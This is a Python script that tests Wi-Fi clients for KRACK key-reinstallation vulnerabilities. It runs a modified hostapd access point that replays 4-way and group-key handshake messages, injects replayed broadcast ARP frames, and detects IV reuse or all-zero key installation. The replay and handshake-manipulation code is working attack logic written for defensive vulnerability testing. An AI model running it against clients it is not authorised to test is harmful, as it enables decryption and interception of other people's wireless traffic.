krack-test-client.py 25 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609
  1. #!/usr/bin/env python2
  2. # Tests for key reinstallation vulnerabilities in Wi-Fi clients
  3. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  4. #
  5. # This code may be distributed under the terms of the BSD license.
  6. # See README for more details.
  7. import logging
  8. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  9. from scapy.all import *
  10. import libwifi
  11. from libwifi import *
  12. import sys, socket, struct, time, subprocess, atexit, select, os.path
  13. from wpaspy import Ctrl
  14. # TODOs:
  15. # - Always mention 4-way handshake attack test (normal, tptk, tptk-rand)
  16. # - Stop testing a client even when we think it's patched?
  17. # - The --gtkinit with the 4-way handshake is very sensitive to packet loss
  18. # - Add an option to test replays of unicast traffic
  19. # Future work:
  20. # - If the client installs an all-zero key, we cannot reliably test the group key handshake
  21. # - Automatically execute all relevant tests in order
  22. # - Force client to request a new IP address when connecting
  23. # - More reliable group key reinstall test: install very high RSC, then install a zero one.
  24. # This avoids constantly having to execute a new 4-way handshake for example.
  # Number of seconds after which a new message 3, or a new group key message 1, is sent.
  # The main loop also uses it as the period between rounds of broadcast ARP tests.
  HANDSHAKE_TRANSMIT_INTERVAL = 2
  27. #### Utility Commands ####
  def hostapd_clear_messages(hostapd_ctrl):
      """Drain every reply/message still queued on the hostapd control interface.

      `hostapd_ctrl` must offer `pending()` and `recv()`; messages are read and
      discarded until `pending()` reports that nothing is left.
      """
      while True:
          if not hostapd_ctrl.pending():
              break
          hostapd_ctrl.recv()
  def hostapd_command(hostapd_ctrl, cmd):
      """Send `cmd` over the hostapd control interface and return the reply.

      Stale messages are flushed first. If the reply contains "UNKNOWN COMMAND"
      or "FAIL", an error is logged and the script exits with status 1.
      """
      hostapd_clear_messages(hostapd_ctrl)
      reply = hostapd_ctrl.request(cmd)

      unrecognized = "UNKNOWN COMMAND" in reply
      if unrecognized or "FAIL" in reply:
          if unrecognized:
              log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
          else:
              log(ERROR, "Failed to execute command %s" % cmd)
          quit(1)

      return reply
  42. #### Main Testing Code ####
  class TestOptions():
      """Describes which test is executed and how it is tuned."""

      # Test variants
      ReplayBroadcast = 0
      ReplayUnicast = 1
      Fourway = 2
      Grouphs = 3

      # TPTK modes, only meaningful for Fourway tests
      TptkNone = 0
      TptkReplay = 1
      TptkRand = 2

      def __init__(self, variant=Fourway):
          # Which of the test variants above to run
          self.variant = variant

          # Additional option for Fourway tests
          self.tptk = TestOptions.TptkNone

          # Extra option for Fourway and Grouphs tests
          self.gtkinit = False
  class ClientState():
      """Everything the script tracks about one client under test.

      Holds the verdicts of the pairwise (4-way handshake) and broadcast tests,
      the IVs the client has used, and the state machine of the replayed
      broadcast ARP test.
      """

      # Verdicts stored in vuln_4way and vuln_bcast
      UNKNOWN, VULNERABLE, PATCHED = 0, 1, 2
      # Phases of the broadcast ARP test, stored in broadcast_state
      IDLE, STARTED, GOT_CANARY, FINISHED = 0, 1, 2, 3

      def __init__(self, clientmac, options):
          self.mac = clientmac
          self.options = options
          self.TK = None
          self.vuln_4way = ClientState.UNKNOWN
          self.vuln_bcast = ClientState.UNKNOWN

          self.ivs = IvCollection()
          self.pairkey_sent_time_prev_iv = None
          self.pairkey_intervals_no_iv_reuse = 0

          self.broadcast_reset()

      def broadcast_reset(self):
          """Put the broadcast ARP test back into its initial (idle) state."""
          self.broadcast_state = ClientState.IDLE
          self.broadcast_prev_canary_time = 0
          # Both counters start at -1 because the first broadcast ARP requests are still valid
          self.broadcast_num_canaries_received = -1
          self.broadcast_requests_sent = -1
          self.broadcast_patched_intervals = 0

      # TODO: Put in libwifi?
      def get_encryption_key(self, hostapd_ctrl):
          """Return the pairwise key (TK), asking the modified hostapd for it on first use."""
          if self.TK is not None:
              return self.TK

          # Contact our modified Hostapd instance to request the pairwise key
          reply = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
          if "FAIL" not in reply:
              self.TK = reply.strip().decode("hex")
          return self.TK

      # TODO: Put in libwifi?
      def decrypt(self, p, hostapd_ctrl):
          """Return the plaintext payload (starting at the LLC/SNAP header) of frame `p`."""
          llc_prefix = "\xAA\xAA\x03\x00\x00\x00"
          payload = get_ccmp_payload(p)

          # On some kernels, the virtual interface associated to the real AP interface will return
          # frames where the payload is already decrypted (this happens when hardware decryption is
          # used). So if the payload seems decrypted, just hand back the full payload.
          if payload.startswith(llc_prefix):
              return payload

          plaintext = decrypt_ccmp(p, self.get_encryption_key(hostapd_ctrl))
          if plaintext.startswith(llc_prefix):
              return plaintext

          # Decryption with the pairwise key failed, so fall back to an all-zero key
          return decrypt_ccmp(p, "\x00" * 16)

      def track_used_iv(self, p):
          """Record the IV of `p` in this client's IV collection."""
          return self.ivs.track_used_iv(p)

      def is_iv_reused(self, p):
          """Ask this client's IV collection whether the IV of `p` is a reuse."""
          return self.ivs.is_iv_reused(p)

      def check_pairwise_reinstall(self, p):
          """Update the 4-way handshake verdict based on the IV used by frame `p`."""
          # Guaranteed IV reuse (and not just a benign retransmission): the client is vulnerable
          if self.ivs.is_iv_reused(p):
              if self.vuln_4way != ClientState.VULNERABLE:
                  iv = dot11_get_iv(p)
                  seq = dot11_get_seqnum(p)
                  log(WARNING, ("%s: IV reuse detected (IV=%d, seq=%d). " +
                      "Client reinstalls the pairwise key in the 4-way handshake (this is bad)") % (self.mac, iv, seq))
              self.vuln_4way = ClientState.VULNERABLE
              return

          # Only an IV higher than all previous ones can hint that an undecided client is patched
          if self.vuln_4way != ClientState.UNKNOWN or not self.ivs.is_new_iv(p):
              return

          # Count the intervals in which we received a data packet without IV reset. Use twice the
          # transmission interval of message 3, in case one message 3 is lost due to noise.
          previous = self.pairkey_sent_time_prev_iv
          if previous is None:
              self.pairkey_sent_time_prev_iv = p.time
          elif previous + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
              self.pairkey_intervals_no_iv_reuse += 1
              self.pairkey_sent_time_prev_iv = p.time
              log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)

          # If during several intervals all IV reset attempts failed, the client is likely patched.
          # We wait for enough such intervals to occur, to avoid getting a wrong result.
          if self.pairkey_intervals_no_iv_reuse < 5 or self.vuln_4way != ClientState.UNKNOWN:
              return
          self.vuln_4way = ClientState.PATCHED

          # Clarify *which* type of attack failed (to remind the user to test other attacks as well)
          attack_notes = {
              TestOptions.TptkNone: " (used standard attack)",
              TestOptions.TptkReplay: " (used TPTK attack)",
              TestOptions.TptkRand: " (used TPTK-RAND attack)",
          }
          msg = "%s: client DOESN'T reinstall the pairwise key in the 4-way handshake (this is good)"
          msg += attack_notes.get(self.options.tptk, "")
          log(INFO, (msg + ".") % self.mac, color="green")

      def mark_allzero_key(self, p):
          """Mark the client as vulnerable because frame `p` was encrypted with an all-zero key."""
          already_flagged = self.vuln_4way == ClientState.VULNERABLE
          if not already_flagged:
              iv = dot11_get_iv(p)
              seq = dot11_get_seqnum(p)
              log(WARNING, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
                  "Client (re)installs an all-zero key in the 4-way handshake (this is very bad).") % (self.mac, iv, seq))
              log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this vulnerability first !!!" % self.mac, color="red")
          self.vuln_4way = ClientState.VULNERABLE

      def broadcast_print_patched(self):
          """Report that the broadcast test found the client to behave correctly."""
          variant = self.options.variant
          if variant in (TestOptions.Fourway, TestOptions.Grouphs):
              # TODO: Mention which variant of the 4-way handshake test was used
              if variant == TestOptions.Grouphs:
                  hstype = "group key"
              else:
                  hstype = "4-way"
              if self.options.gtkinit:
                  log(INFO, "%s: Client installs the group key in the %s handshake with the given replay counter (this is good)" % (self.mac, hstype), color="green")
              else:
                  log(INFO, "%s: Client DOESN'T reinstall the group key in the %s handshake (this is good)" % (self.mac, hstype), color="green")
          if variant == TestOptions.ReplayBroadcast:
              log(INFO, "%s: Client DOESN'T accept replayed broadcast frames (this is good)" % self.mac, color="green")

      def broadcast_print_vulnerable(self):
          """Report that the broadcast test found the client to be vulnerable."""
          variant = self.options.variant
          if variant in (TestOptions.Fourway, TestOptions.Grouphs):
              if variant == TestOptions.Grouphs:
                  hstype = "group key"
              else:
                  hstype = "4-way"
              if self.options.gtkinit:
                  log(WARNING, "%s: Client always installs the group key in the %s handshake with a zero replay counter (this is bad)." % (self.mac, hstype))
              else:
                  log(WARNING, "%s: Client reinstalls the group key in the %s handshake (this is bad)." % (self.mac, hstype))
              log(WARNING, " Or client accepts replayed broadcast frames (see --replay-broadcast).")
          if variant == TestOptions.ReplayBroadcast:
              log(WARNING, "%s: Client accepts replayed broadcast frames (this is bad)." % self.mac)
              log(WARNING, " Fix this before testing for group key (re)installations!")

      def broadcast_process_reply(self, p):
          """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
          # Must be testing this client, and must not be a benign retransmission
          if self.broadcast_state not in (ClientState.STARTED, ClientState.GOT_CANARY):
              return
          if self.broadcast_prev_canary_time + 1 > p.time:
              return

          self.broadcast_num_canaries_received += 1
          log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.broadcast_num_canaries_received))

          # We wait for several replies before marking the client as vulnerable, because
          # the first few broadcast ARP requests still use a valid (not yet used) IV.
          if self.broadcast_num_canaries_received < 5:
              # Remember that we got a reply this interval (broadcast_check_replies uses
              # this to detect patched clients)
              self.broadcast_state = ClientState.GOT_CANARY
          else:
              assert self.vuln_bcast != ClientState.VULNERABLE
              self.vuln_bcast = ClientState.VULNERABLE
              self.broadcast_state = ClientState.FINISHED
              self.broadcast_print_vulnerable()

          self.broadcast_prev_canary_time = p.time

      def broadcast_check_replies(self):
          """Track when we send broadcast ARP requests, and determine if a client seems patched"""
          if self.broadcast_state == ClientState.IDLE:
              return

          if self.broadcast_requests_sent == 4:
              state = self.broadcast_state
              if state == ClientState.GOT_CANARY:
                  # At least one of the four broadcast ARP requests got a reply, which
                  # points towards a vulnerable client.
                  log(DEBUG, "%s: got a reply to broadcast ARPs during this interval" % self.mac)
                  self.broadcast_state = ClientState.STARTED
              elif state == ClientState.STARTED:
                  # None of the four broadcast ARP requests got a reply, which points
                  # towards a patched client.
                  self.broadcast_patched_intervals += 1
                  log(DEBUG, "%s: didn't get reply received to broadcast ARPs during this interval" % self.mac)
                  self.broadcast_state = ClientState.STARTED

              self.broadcast_requests_sent = 0

          # If the client appears secure for several intervals (see above), it's likely patched
          seems_patched = self.broadcast_patched_intervals >= 5
          if seems_patched and self.vuln_bcast == ClientState.UNKNOWN:
              self.vuln_bcast = ClientState.PATCHED
              self.broadcast_state = ClientState.FINISHED
              self.broadcast_print_patched()
  class KRAckAttackClient():
      """Runs the patched hostapd instance and tests connecting clients for key reinstallations.

      The object owns the hostapd process and its control interface, a monitor
      socket and an Ethernet socket on the AP interface, the DHCP/ARP responders,
      and one ClientState per client seen on the monitor interface.
      """

      def __init__(self):
          """Read hostapd.conf next to this script and initialise all state.

          Exits with status 1 when no interface can be determined; re-raises when
          the config cannot be parsed or the interface has no MAC address.
          """
          # Parse hostapd.conf
          self.script_path = os.path.dirname(os.path.realpath(__file__))
          try:
              interface = hostapd_read_config(os.path.join(self.script_path, "hostapd.conf"))
          except Exception:
              log(ERROR, "Failed to parse the hostapd.conf config file")
              raise
          if not interface:
              log(ERROR, 'Failed to determine wireless interface. Specify one in hostapd.conf at the line "interface=NAME".')
              quit(1)

          # Set other variables
          self.nic_iface = interface
          self.nic_mon = interface + "mon"
          self.options = None
          try:
              self.apmac = scapy.arch.get_if_hwaddr(interface)
          except Exception:
              log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
              raise

          self.sock_mon = None
          self.sock_eth = None
          self.hostapd = None
          self.hostapd_ctrl = None

          self.dhcp = None
          self.broadcast_sender_ip = None
          self.broadcast_arp_sock = None

          self.clients = dict()

      def reset_client_info(self, clientmac):
          """Forget the DHCP lease and the ClientState of `clientmac`, if present."""
          if clientmac in self.dhcp.leases:
              self.dhcp.remove_client(clientmac)
              log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
          if clientmac in self.clients:
              del self.clients[clientmac]
              log(DEBUG, "%s: Removing ClientState object" % clientmac)

      def handle_replay(self, p):
          """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
          function processes these frames manually so we can still test reinstallations of the group key."""
          if not Dot11WEP in p: return

          # Reconstruct Ethernet header
          clientmac = p.addr2
          header = Ether(dst=self.apmac, src=clientmac)
          header.time = p.time

          # Decrypt the payload and obtain LLC/SNAP header and packet content
          client = self.clients[clientmac]
          plaintext = client.decrypt(p, self.hostapd_ctrl)
          llcsnap, packet = plaintext[:8], plaintext[8:]

          # Rebuild the full Ethernet packet; the last two LLC/SNAP bytes select the protocol
          if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
              decap = header/ARP(packet)
          elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
              decap = header/IP(packet)
          elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
              decap = header/IPv6(packet)
          #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
          #    # EAPOL
          else:
              return

          # Now process the packet as if it were a valid (non-replayed) one
          self.process_eth_rx(decap)

      def handle_mon_rx(self):
          """Process one frame from the monitor interface: track clients, IVs and replays."""
          p = self.sock_mon.recv()
          if p is None: return
          if p.type == 1: return

          # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
          # ARP requests, because it may override them in the firmware/hardware (some Atheros
          # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).

          # Mask 0x2 of FCfield decides which address is the client: when it is set, addr1 is
          # the client and addr2 the AP, otherwise the roles are swapped.
          # NOTE(review): the original comment called this the "to-DS" bit; in the 802.11
          # frame control flags mask 0x2 is from-DS (frame sent by the AP) - confirm.
          clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
          if apmac != self.apmac: return None

          # Reset info about disconnected clients
          if Dot11Deauth in p or Dot11Disas in p:
              self.reset_client_info(clientmac)

          # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
          elif p.addr1 == self.apmac and Dot11WEP in p:
              if not clientmac in self.clients:
                  # Use the options handed to run() rather than a module-level global, so
                  # the class also works when it is not driven by this file's __main__ code.
                  self.clients[clientmac] = ClientState(clientmac, options=self.options)
              client = self.clients[clientmac]

              iv = dot11_get_iv(p)
              log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))

              if decrypt_ccmp(p, "\x00" * 16).startswith("\xAA\xAA\x03\x00\x00\x00"):
                  client.mark_allzero_key(p)
              if self.options.variant == TestOptions.Fourway and not self.options.gtkinit:
                  client.check_pairwise_reinstall(p)
              if client.is_iv_reused(p):
                  self.handle_replay(p)
              # Track the IV only after the reuse checks above have looked at it
              client.track_used_iv(p)

      def process_eth_rx(self, p):
          """Answer DHCP/ARP for Ethernet frame `p` and feed ARP replies to the broadcast test."""
          self.dhcp.reply(p)
          self.broadcast_arp_sock.reply(p)

          clientmac = p[Ether].src
          if not clientmac in self.clients: return
          client = self.clients[clientmac]

          # ARP traffic addressed to our dedicated sender IP answers a replayed broadcast request
          if ARP in p and p[ARP].pdst == self.broadcast_sender_ip:
              client.broadcast_process_reply(p)

      def handle_eth_rx(self):
          """Process one frame received on the normal (Ethernet) AP interface."""
          p = self.sock_eth.recv()
          if p is None or not Ether in p: return
          self.process_eth_rx(p)

      def broadcast_send_request(self, client):
          """Send one replayed broadcast ARP request (and a group message 1 if needed) to `client`."""
          clientip = self.dhcp.leases[client.mac]

          # Print a message when we start testing the client --- XXX this should be in the client?
          if client.broadcast_state == ClientState.IDLE:
              log(STATUS, "%s: client has IP address -> now sending replayed broadcast ARP packets" % client.mac)
              client.broadcast_state = ClientState.STARTED

          # Send a new handshake message when testing the group key handshake
          if self.options.variant == TestOptions.Grouphs:
              cmd = "RESEND_GROUP_M1 " + client.mac
              # The option must be a separate, space-delimited argument
              cmd += " maxrsc" if self.options.gtkinit else ""
              hostapd_command(self.hostapd_ctrl, cmd)

          # Send a replayed broadcast ARP request to the client
          request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.broadcast_sender_ip, pdst=clientip)
          self.sock_eth.send(request)
          client.broadcast_requests_sent += 1
          log(INFO, "%s: sending broadcast ARP to %s from %s (sent %d ARPs this interval)" % (client.mac,
              clientip, self.broadcast_sender_ip, client.broadcast_requests_sent))

      def experimental_test_igtk_installation(self, client=None):
          """To test if the IGTK is installed using the given replay counter

          `client` is the ClientState to target; when omitted, every known client
          is targeted. The script exits once the message(s) have been sent.
          """
          # 1. Set ieee80211w=2 in hostapd.conf
          # 2. Run this script using --gtkinit so a new group key is generated before calling this function

          # 3. Install the new IGTK using a very high given replay counter
          targets = list(self.clients.values()) if client is None else [client]
          for target in targets:
              hostapd_command(self.hostapd_ctrl, "RESEND_GROUP_M1 %s maxrsc" % target.mac)
          time.sleep(1)

          # 4. Now kill the AP
          quit(1)

          # 5. Hostapd sends a broadcast deauth message. At least iOS will reply using its own
          #    deauthentication respose if this frame is accepted. Sometimes hostapd doesn't
          #    send a broadcast deauthentication. Is this when the client is sleeping?

      def configure_interfaces(self):
          """Unblock Wi-Fi and (re)create the virtual monitor interface next to the AP interface."""
          log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")

          # 0. Some users may forget this otherwise
          subprocess.check_output(["rfkill", "unblock", "wifi"])

          # 1. Remove unused virtual interfaces to start from a clean state
          subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)

          # 2. Configure monitor mode on interfaces
          subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
          # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
          # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
          subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
          time.sleep(0.5)
          subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
          subprocess.check_output(["ifconfig", self.nic_mon, "up"])

      def run(self, options):
          """Start hostapd and the helper sockets, then run the test loop (never returns normally)."""
          self.options = options
          self.configure_interfaces()

          # Open the patched hostapd instance that carries out tests and let it start
          log(STATUS, "Starting hostapd ...")
          hostapd_path = os.path.join(self.script_path, "../hostapd/hostapd")
          try:
              self.hostapd = subprocess.Popen([
                  hostapd_path,
                  os.path.join(self.script_path, "hostapd.conf")]
                  + sys.argv[1:])
          except Exception:
              # Check the same path that was just executed, not one relative to the working directory
              if not os.path.exists(hostapd_path):
                  log(ERROR, "hostapd executable not found. Did you compile hostapd? Use --help param for more info.")
              raise
          time.sleep(1)

          try:
              self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
              self.hostapd_ctrl.attach()
          except Exception:
              log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
              log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
              raise

          self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
          self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)

          # Let scapy handle DHCP requests
          self.dhcp = DHCP_sock(sock=self.sock_eth,
                          domain='krackattack.com',
                          pool=Net('192.168.100.0/24'),
                          network='192.168.100.0/24',
                          gw='192.168.100.254',
                          renewal_time=600, lease_time=3600)
          # Configure gateway IP: reply to ARP and ping requests
          subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])

          # Use a dedicated IP address for our broadcast ARP requests and replies
          self.broadcast_sender_ip = self.dhcp.pool.pop()
          self.broadcast_arp_sock = ARP_sock(sock=self.sock_eth, IP_addr=self.broadcast_sender_ip, ARP_addr=self.apmac)

          log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")

          # Monitor both the normal interface and virtual monitor interface of the AP
          self.next_arp = time.time() + 1
          while True:
              sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
              if self.sock_mon in sel[0]: self.handle_mon_rx()
              if self.sock_eth in sel[0]: self.handle_eth_rx()

              # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
              if time.time() > self.next_arp:
                  # When testing if the replay counter of the group key is properly installed, always install
                  # a new group key. Otherwise KRACK patches might interfere with this test.
                  # Otherwise just reset the replay counter of the current group key.
                  if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs] and self.options.gtkinit:
                      hostapd_command(self.hostapd_ctrl, "RENEW_GTK")
                  else:
                      hostapd_command(self.hostapd_ctrl, "RESET_PN FF:FF:FF:FF:FF:FF")

                  self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
                  for client in self.clients.values():
                      #self.experimental_test_igtk_installation(client)

                      # 1. Test the 4-way handshake
                      if self.options.variant == TestOptions.Fourway and self.options.gtkinit and client.vuln_bcast != ClientState.VULNERABLE:
                          # Execute a new handshake to test stations that don't accept a retransmitted message 3
                          hostapd_command(self.hostapd_ctrl, "RENEW_PTK " + client.mac)
                          # TODO: wait untill 4-way handshake completed? And detect failures (it's sensitive to frame losses)?
                      elif self.options.variant == TestOptions.Fourway and not self.options.gtkinit and client.vuln_4way != ClientState.VULNERABLE:
                          # First inject a message 1 if requested using the TPTK option
                          if self.options.tptk == TestOptions.TptkReplay:
                              hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac)
                          elif self.options.tptk == TestOptions.TptkRand:
                              hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac + " change-anonce")

                          # Note that we rely on an encrypted message 4 as reply to detect pairwise key reinstallations.
                          hostapd_command(self.hostapd_ctrl, "RESEND_M3 " + client.mac + (" maxrsc" if self.options.gtkinit else ""))

                      # 2. Test if broadcast ARP request are accepted by the client. Keep injecting even
                      #    to PATCHED clients (just to be sure they keep rejecting replayed frames).
                      if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs, TestOptions.ReplayBroadcast]:
                          # 2a. Check if we got replies to previous requests (and determine if vulnerable)
                          client.broadcast_check_replies()

                          # 2b. Send new broadcast ARP requests (and handshake messages if needed)
                          if client.vuln_bcast != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
                              self.broadcast_send_request(client)

      def stop(self):
          """Terminate hostapd (waiting for it to exit) and close both sockets."""
          log(STATUS, "Closing hostapd and cleaning up ...")
          if self.hostapd:
              self.hostapd.terminate()
              self.hostapd.wait()
          if self.sock_mon: self.sock_mon.close()
          if self.sock_eth: self.sock_eth.close()
  def cleanup():
      """Exit hook: stop the module-level `attack` object."""
      attack.stop()
  def argv_get_interface():
      """Return the interface given through `-i` on the command line, or None.

      Both the attached form (`-iwlan0`) and the separated form (`-i wlan0`) are
      recognised; only the first argument starting with `-i` is considered.
      A trailing `-i` without a value yields None instead of raising IndexError.
      """
      for idx, arg in enumerate(sys.argv):
          if not arg.startswith("-i"):
              continue
          if len(arg) > 2:
              return arg[2:]
          if idx + 1 < len(sys.argv):
              return sys.argv[idx + 1]
          # "-i" was the last argument, so there is no value to return
          return None
      return None
  def argv_pop_argument(argument):
      """Remove the first occurrence of `argument` from sys.argv.

      Returns True when the argument was present (and has been removed), and
      False when sys.argv did not contain it.
      """
      try:
          sys.argv.remove(argument)
      except ValueError:
          return False
      return True
  def hostapd_read_config(config):
      """Return the interface name to use, read from the hostapd config file `config`.

      The last `interface=` line in the file supplies the name. A pairwise cipher
      line that mentions TKIP aborts the script with status 1. An interface given
      with `-i` on the command line overrides the one from the file.
      """
      interface = None
      with open(config) as fp:
          for raw_line in fp:
              entry = raw_line.strip()
              if entry.startswith("interface="):
                  interface = entry.split('=')[1]
                  continue
              if not entry.startswith(("wpa_pairwise=", "rsn_pairwise")):
                  continue
              if "TKIP" in entry:
                  log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
                  log(ERROR, " >%s<" % entry, showtime=False)
                  quit(1)

      # Parameter -i overrides interface in config.
      # FIXME: Display warning when multiple interfaces are used.
      cli_interface = argv_get_interface()
      if cli_interface is not None:
          interface = cli_interface

      return interface
  if __name__ == "__main__":
      # Script entry point: parse the command line into a TestOptions object and run the tests.
      # Arguments recognised here are removed from sys.argv; whatever remains is later
      # passed on to hostapd by KRAckAttackClient.run().
      if "--help" in sys.argv or "-h" in sys.argv:
          accepted = ["--replay-broadcast", "--group", "--tptk", "--tptk-rand", "--gtkinit", "--debug"]
          print("\nSee README.md for usage instructions. Accepted parameters are")
          print("\n\t" + "\n\t".join(accepted) + "\n")
          quit(1)

      options = TestOptions()

      # Parse the type of test variant to execute
      replay_broadcast = argv_pop_argument("--replay-broadcast")
      replay_unicast = argv_pop_argument("--replay-unicast")
      groupkey = argv_pop_argument("--group")
      fourway = argv_pop_argument("--fourway")
      if sum([replay_broadcast, replay_unicast, fourway, groupkey]) > 1:
          print("You can only select one argument of out replay-broadcast, replay-unicast, fourway, and group")
          quit(1)

      # The 4-way handshake test is the default when no variant was requested
      options.variant = TestOptions.Fourway
      if replay_broadcast:
          options.variant = TestOptions.ReplayBroadcast
      elif replay_unicast:
          options.variant = TestOptions.ReplayUnicast
      elif groupkey:
          options.variant = TestOptions.Grouphs

      # Parse options for the 4-way handshake
      tptk = argv_pop_argument("--tptk")
      tptk_rand = argv_pop_argument("--tptk-rand")
      if sum([tptk, tptk_rand]) > 1:
          print("You can only select one argument of out tptk and tptk-rand")
          quit(1)

      options.tptk = TestOptions.TptkNone
      if tptk:
          options.tptk = TestOptions.TptkReplay
      elif tptk_rand:
          options.tptk = TestOptions.TptkRand

      # Parse remaining options
      options.gtkinit = argv_pop_argument("--gtkinit")

      # Every --debug lowers the libwifi log level by one step
      while argv_pop_argument("--debug"):
          libwifi.global_log_level -= 1

      # Now start the tests
      attack = KRAckAttackClient()
      atexit.register(cleanup)
      attack.run(options=options)